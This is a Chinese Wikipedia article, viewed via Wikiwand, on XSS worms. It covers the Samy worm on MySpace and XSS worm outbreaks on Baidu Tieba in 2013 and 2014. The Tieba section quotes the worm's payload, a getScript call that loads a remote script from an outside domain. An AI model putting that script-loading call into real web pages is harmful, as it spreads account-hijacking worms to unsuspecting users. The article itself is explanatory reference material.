热门问题

时间线

聊天

视角

XSS蠕蟲

来自维基百科，自由的百科全书

Remove ads

xss蠕蟲（cross site scripting worm）是一種跨站病毒，通常由腳本語言Javascript寫成，它藉由網站訪問者傳播

本條目存在以下問題，請協助改善本條目或在討論頁針對議題發表看法。

此條目包含過多行話或專業術語，可能需要簡化或提出進一步解釋。 (2013年5月19日)

此條目需要擴充。 (2013年5月19日)

此條目需要補充更多來源。 (2013年5月19日)

歷史

歷史第一個XSS蠕蟲是針對網站Myspace的Samy，它在20小時內感染了100萬個帳戶，作者Samy Kamkar之後被起訴

新浪微博

見對新浪微博的爭議#XSS.E6.BC.8F.E6.B4.9E

百度貼吧

2013年5月19日，百度貼吧轉帖功能再度出現xss漏洞，大量貼吧內充斥接近滿版面，包含代碼getScript（'//xss.retaker.me/1.js'）為標題的帖子，當已登陸用戶打開這樣的帖子，用戶所持帳戶便以相同方式在多個貼吧轉帖原作者的帖，部分網絡安全相關人士認為貼吧爆發了大規模XSS蠕蟲感染^[1] ^[2] ^[3]

2014年3月9日，百度貼吧轉帖功能再度出現xss漏洞

性質

由於XSS蠕蟲基於瀏覽器而不是作業系統，取決於其依賴網站的規模，它可以在短時間內達到對巨大數量的計算機感染

參考

Loading content...

Loading related searches...

Wikiwand - on

Seamless Wikipedia browsing. On steroids.

Remove ads

Remove ads